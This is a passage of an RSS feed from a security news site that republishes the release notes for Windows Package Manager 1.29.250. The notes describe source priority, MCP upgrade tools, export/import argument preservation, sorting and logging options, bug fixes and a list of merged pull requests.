<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mamoreau-devolutions/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mamoreau-devolutions">@mamoreau-devolutions</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311593126" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6172" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6172/hovercard" href="https://github.com/microsoft/winget-cli/pull/6172">#6172</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.28.240...v1.29.240"><tt>v1.28.240...v1.29.240</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.29.250]]></title>
<description><![CDATA[This is a release candidate of Windows Package Manager v1.29. If you find any bugs or problems, please help us out by filing an issue.
New in v1.29
New Feature: Source Priority
NoteExperimental under sourcePriority; defaulted to disabled.

With this feature, one can assign a numerical priority to...]]></description>
<link>https://tsecurity.de/de/3601251/downloads/windows-package-manager-129250/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601251/downloads/windows-package-manager-129250/</guid>
<pubDate>Tue, 16 Jun 2026 11:31:45 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a release candidate of Windows Package Manager v1.29. If you find any bugs or problems, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.29</h2>
<h1>New Feature: Source Priority</h1>
<div class="markdown-alert markdown-alert-note"><p class="markdown-alert-title"><svg data-component="Octicon" class="octicon octicon-info mr-2" viewbox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="M0 8a8 8 0 1 1 16 0A8 8 0 0 1 0 8Zm8-6.5a6.5 6.5 0 1 0 0 13 6.5 6.5 0 0 0 0-13ZM6.5 7.75A.75.75 0 0 1 7.25 7h1a.75.75 0 0 1 .75.75v2.75h.25a.75.75 0 0 1 0 1.5h-2a.75.75 0 0 1 0-1.5h.25v-2h-.25a.75.75 0 0 1-.75-.75ZM8 6a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg>Note</p><p>Experimental under <code>sourcePriority</code>; defaulted to disabled.</p>
</div>
<p>With this feature, one can assign a numerical priority to sources when added or later through the <code>source edit</code><br>
command. Sources with higher priority are sorted first in the list of sources, which results in them getting put first<br>
in the results if other things are equal.</p>
<div class="markdown-alert markdown-alert-tip"><p class="markdown-alert-title"><svg data-component="Octicon" class="octicon octicon-light-bulb mr-2" viewbox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="M8 1.5c-2.363 0-4 1.69-4 3.75 0 .984.424 1.625.984 2.304l.214.253c.223.264.47.556.673.848.284.411.537.896.621 1.49a.75.75 0 0 1-1.484.211c-.04-.282-.163-.547-.37-.847a8.456 8.456 0 0 0-.542-.68c-.084-.1-.173-.205-.268-.32C3.201 7.75 2.5 6.766 2.5 5.25 2.5 2.31 4.863 0 8 0s5.5 2.31 5.5 5.25c0 1.516-.701 2.5-1.328 3.259-.095.115-.184.22-.268.319-.207.245-.383.453-.541.681-.208.3-.33.565-.37.847a.751.751 0 0 1-1.485-.212c.084-.593.337-1.078.621-1.489.203-.292.45-.584.673-.848.075-.088.147-.173.213-.253.561-.679.985-1.32.985-2.304 0-2.06-1.637-3.75-4-3.75ZM5.75 12h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1 0-1.5ZM6 15.25a.75.75 0 0 1 .75-.75h2.5a.75.75 0 0 1 0 1.5h-2.5a.75.75 0 0 1-.75-.75Z"></path></svg>Tip</p><p>Search result ordering in winget is currently based on these values in this order:</p>
<ol>
<li>Match quality (how well a valid field matches the search request)</li>
<li>Match field (which field was matched against the search request)</li>
<li>Source order (was always relevant, but with priority you can more easily affect this)</li>
</ol>
</div>
<p>Beyond the ability to slightly affect the result ordering, commands that primarily target available packages<br>
(largely <code>install</code>) will now prefer to use a single result from a source with higher priority rather than prompting for<br>
disambiguation from the user. Said another way, if multiple sources return results but only one of those sources has<br>
the highest priority value (and it returned only one result) then that package will be used rather than giving a<br>
"multiple packages were found" error. This has been applied to both winget CLI and PowerShell module commands.</p>
<h3>REST result match criteria update</h3>
<p>Along with the source priority change, the results from REST sources (like <code>msstore</code>) now attempt to correctly set the<br>
match criteria that factor into the result ordering. This will prevent them from being sorted to the top automatically.</p>
<h2>Minor Features</h2>
<h3>Preserve installer arguments across export and import</h3>
<p><code>winget export</code> now captures the <code>--override</code> and <code>--custom</code> arguments that were used when a package was originally installed and saves them into the export file. When subsequently running <code>winget import</code>, those values are automatically re-applied during installation — <code>--override</code> replaces all installer arguments and <code>--custom</code> appends extra switches — so packages can be reinstalled with the same customizations without any manual intervention. Both fields are optional and independent of each other; packages without stored installer arguments are unaffected.</p>
<h3>--no-progress flag</h3>
<p>Added a new <code>--no-progress</code> command-line flag that disables all progress reporting (progress bars and spinners). This flag is universally available on all commands and takes precedence over the <code>visual.progressBar</code> setting. Useful for automation scenarios or when running WinGet in environments where progress output is undesirable.</p>
<h3>MCP <code>upgrade</code> support</h3>
<p>The WinGet MCP server's existing tools have been extended with new parameters to support upgrade scenarios:</p>
<ul>
<li><strong><code>find-winget-packages</code></strong> now accepts an <code>upgradeable</code> parameter (default: <code>false</code>). When set to <code>true</code>, it lists only installed packages that have available upgrades — equivalent to <code>winget upgrade</code>. The <code>query</code> parameter becomes optional in this mode, allowing it to filter results or be omitted to list all upgradeable packages. AI agents can use this to answer requests like "What apps can I update with WinGet?"</li>
<li><strong><code>install-winget-package</code></strong> now accepts an <code>upgradeOnly</code> parameter (default: <code>false</code>). When set to <code>true</code>, it only upgrades an already-installed package and returns a clear error if the package is not installed (pointing to <code>install-winget-package</code> without <code>upgradeOnly</code> instead). AI agents can use this to answer requests like "Update WinGetCreate" or, in combination with <code>find-winget-packages</code> with <code>upgradeable=true</code>, "Update all my apps."</li>
</ul>
<h3>Authenticated GitHub API requests in PowerShell module</h3>
<p>The PowerShell module now automatically uses <code>GH_TOKEN</code> or <code>GITHUB_TOKEN</code> environment variables to authenticate GitHub API requests. This significantly increases the GitHub API rate limit, preventing failures in CI/CD pipelines. Use <code>-Verbose</code> to see which token is being used.</p>
<h3>Default priority of installer types</h3>
<p>Installer type selection no longer depends on the order defined on the manifest. Instead, preference is given in this order:</p>
<ul>
<li>MSIX</li>
<li>MSI / Wix / Burn</li>
<li>Nullsoft / Inno / EXE</li>
<li>Portable</li>
</ul>
<p>When a user configures installer type requirements or preferences, the order in which they are listed is now respected during installer selection.</p>
<h3>Improved <code>list</code> output when redirected</h3>
<ul>
<li><code>winget list</code> (and similar table commands) no longer truncates output when stdout is redirected to a file or variable — column widths are now computed from the full result set.</li>
<li>Spinner and progress bar output are suppressed when no console is attached, keeping redirected output clean.</li>
</ul>
<h3>Log file naming strategy</h3>
<p>Added a user setting (<code>logging.fileNameStrategy</code>) for controlling the default naming strategy for installer log files. Supported values are <code>manifest</code> (default), <code>timestamp</code>, <code>guid</code>, and <code>shortguid</code>. Only applies to logs generated by installers if the installer itself supports the logging switch / parameter.</p>
<table>
<thead>
<tr>
<th>Setting</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>manifest</td>
<td>Uses the name of the manifest and a timestamp. Has the same behavior as WinGet 1.28</td>
</tr>
<tr>
<td>timestamp</td>
<td>The log name is just a timestamp</td>
</tr>
<tr>
<td>guid</td>
<td>The log name is a GUID</td>
</tr>
<tr>
<td>shortguid</td>
<td>The log name is the first 8 characters of a GUID</td>
</tr>
</tbody>
</table>
<h3>Sortable <code>list</code> output</h3>
<p><code>winget list</code> now supports sorting results via <code>--sort &lt;field&gt;</code> (repeatable for multi-field sorting), <code>--ascending</code>/<code>--descending</code> direction flags, and a persistent <code>output.sortOrder</code> setting. Available sort fields: <code>name</code>, <code>id</code>, <code>version</code>, <code>source</code>, <code>available</code>, <code>relevance</code>. By default, results are sorted alphabetically by name when no query is present; use <code>--sort relevance</code> to preserve the previous source-determined ordering.</p>
<h2>Bug Fixes</h2>
<ul>
<li><code>winget export</code> now works when the destination path is a hidden file</li>
<li>Fixed the <code>useLatest</code> property in the DSC v3 <code>Microsoft.WinGet/Package</code> resource schema to emit a boolean default (<code>false</code>) instead of the incorrect string <code>"false"</code>.</li>
<li><code>SignFile</code> in <code>WinGetSourceCreator</code> now supports an optional RFC 3161 timestamp server via the new <code>TimestampServer</code> property on the <code>Signature</code> model. When set, <code>signtool.exe</code> is called with <code>/tr &lt;url&gt; /td sha256</code>, embedding a countersignature timestamp so that signed packages remain valid after the signing certificate expires.</li>
<li>File and directory paths passed to <code>signtool.exe</code> and <code>makeappx.exe</code> are now quoted, fixing failures when paths contain spaces.</li>
<li>DSC export now correctly exports WinGet Admin Settings</li>
<li><code>winget validate</code> now performs case-insensitive comparison for file extensions where applicable</li>
<li><code>winget source reset</code> now properly resets default sources instead of removing them</li>
<li>DSC v3 <code>Microsoft.WinGet/Package</code> resource now honors the <code>installMode</code> property to use silent or interactive installer switches as specified</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>Make list details stable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888464623" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6020" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6020/hovercard" href="https://github.com/microsoft/winget-cli/pull/6020">#6020</a></li>
<li>Move to IReference rather than custom enum for optional bool by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3892646118" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6022" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6022/hovercard" href="https://github.com/microsoft/winget-cli/pull/6022">#6022</a></li>
<li>Apply latest loc patch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893629466" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6023" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6023/hovercard" href="https://github.com/microsoft/winget-cli/pull/6023">#6023</a></li>
<li>Bump version to 1.29 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888315257" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6019" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6019/hovercard" href="https://github.com/microsoft/winget-cli/pull/6019">#6019</a></li>
<li>Remove 'listDetails' from release notes for 1.29 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893739947" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6026" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6026/hovercard" href="https://github.com/microsoft/winget-cli/pull/6026">#6026</a></li>
<li>Update doc as WinGet is not in preview by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gijsreyn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gijsreyn">@Gijsreyn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572990820" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5850" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5850/hovercard" href="https://github.com/microsoft/winget-cli/pull/5850">#5850</a></li>
<li>Replaced "(C)" with "©" in the main menu. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DandelionSprout/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DandelionSprout">@DandelionSprout</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3571577317" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5845" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5845/hovercard" href="https://github.com/microsoft/winget-cli/pull/5845">#5845</a></li>
<li>Source priority by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3897735089" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6029" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6029/hovercard" href="https://github.com/microsoft/winget-cli/pull/6029">#6029</a></li>
<li>Update json vcpkg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3917804123" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6039" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6039/hovercard" href="https://github.com/microsoft/winget-cli/pull/6039">#6039</a></li>
<li>Coalesce comments from loc suggestions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3908837169" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6033" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6033/hovercard" href="https://github.com/microsoft/winget-cli/pull/6033">#6033</a></li>
<li>Update Roadmap Milestones doc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kissaki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kissaki">@Kissaki</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3543261404" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5824" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5824/hovercard" href="https://github.com/microsoft/winget-cli/pull/5824">#5824</a></li>
<li>Add copilot instructions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3939854896" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6048" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6048/hovercard" href="https://github.com/microsoft/winget-cli/pull/6048">#6048</a></li>
<li>Add --no-progress option by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3939862223" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6049" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6049/hovercard" href="https://github.com/microsoft/winget-cli/pull/6049">#6049</a></li>
<li>Remove Crescendo PowerShell by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3954834202" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6056" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6056/hovercard" href="https://github.com/microsoft/winget-cli/pull/6056">#6056</a></li>
<li>Fix casing of WinGet by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958871064" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6059" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6059/hovercard" href="https://github.com/microsoft/winget-cli/pull/6059">#6059</a></li>
<li>Added more info for "Installer Types" values in Settings.md. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DandelionSprout/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DandelionSprout">@DandelionSprout</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3984857044" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6067" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6067/hovercard" href="https://github.com/microsoft/winget-cli/pull/6067">#6067</a></li>
<li>Diagnostics update and stable DSC for tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048008456" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6084" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6084/hovercard" href="https://github.com/microsoft/winget-cli/pull/6084">#6084</a></li>
<li>feat: authenticate GitHub API requests using GH_TOKEN/GITHUB_TOKEN by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wmmc88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wmmc88">@wmmc88</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3997110317" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6071" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6071/hovercard" href="https://github.com/microsoft/winget-cli/pull/6071">#6071</a></li>
<li>Tool to investigate SQLite compression by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4023664222" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6074" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6074/hovercard" href="https://github.com/microsoft/winget-cli/pull/6074">#6074</a></li>
<li>Add dependencies only option by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992749991" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6069" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6069/hovercard" href="https://github.com/microsoft/winget-cli/pull/6069">#6069</a></li>
<li>docs: fix multiple documentation issues (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2915720169" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5296" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/5296/hovercard" href="https://github.com/microsoft/winget-cli/issues/5296">#5296</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3720921587" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5921" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/5921/hovercard" href="https://github.com/microsoft/winget-cli/issues/5921">#5921</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2769295431" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5108" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/5108/hovercard" href="https://github.com/microsoft/winget-cli/issues/5108">#5108</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2238926257" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/4372" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/4372/hovercard" href="https://github.com/microsoft/winget-cli/issues/4372">#4372</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3612941602" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5867" data-hovercard-type="issue" data-hovercard-url="/microsoft/winget-cli/issues/5867/hovercard" href="https://github.com/microsoft/winget-cli/issues/5867">#5867</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GrantMeStrength/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GrantMeStrength">@GrantMeStrength</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4145157508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6110" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6110/hovercard" href="https://github.com/microsoft/winget-cli/pull/6110">#6110</a></li>
<li>Revert help link in DscCommand by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4145628763" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6111" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6111/hovercard" href="https://github.com/microsoft/winget-cli/pull/6111">#6111</a></li>
<li>Update Moq, curl, and c-ares by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147531770" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6112" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6112/hovercard" href="https://github.com/microsoft/winget-cli/pull/6112">#6112</a></li>
<li>Add Timeserver Support for SourceCreator and support spaces in paths and file names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148852287" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6113" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6113/hovercard" href="https://github.com/microsoft/winget-cli/pull/6113">#6113</a></li>
<li>Report skipped upgrades when install technology differs (upgrade --all) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AMDphreak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AMDphreak">@AMDphreak</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111928053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6096" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6096/hovercard" href="https://github.com/microsoft/winget-cli/pull/6096">#6096</a></li>
<li>[AI Generated] Ensure correct DSC export of admin settings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140482006" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6109" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6109/hovercard" href="https://github.com/microsoft/winget-cli/pull/6109">#6109</a></li>
<li>Update default for useLatest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148917499" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6114" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6114/hovercard" href="https://github.com/microsoft/winget-cli/pull/6114">#6114</a></li>
<li>Add Update commands for MCP by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4172268285" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6117" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6117/hovercard" href="https://github.com/microsoft/winget-cli/pull/6117">#6117</a></li>
<li>Preserve overrides with export and import by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173119239" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6118" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6118/hovercard" href="https://github.com/microsoft/winget-cli/pull/6118">#6118</a></li>
<li>Quote winget server path before calling CreateProcess by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yao-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yao-msft">@yao-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190755267" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6122" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6122/hovercard" href="https://github.com/microsoft/winget-cli/pull/6122">#6122</a></li>
<li>Update to spell check v26 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214249146" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6128" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6128/hovercard" href="https://github.com/microsoft/winget-cli/pull/6128">#6128</a></li>
<li>Add issue types to issue templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241777916" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6139" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6139/hovercard" href="https://github.com/microsoft/winget-cli/pull/6139">#6139</a></li>
<li>Improve MOTW error handling in download flow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214001872" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6127" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6127/hovercard" href="https://github.com/microsoft/winget-cli/pull/6127">#6127</a></li>
<li>Allow exporting to hidden files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3504005348" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5795" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5795/hovercard" href="https://github.com/microsoft/winget-cli/pull/5795">#5795</a></li>
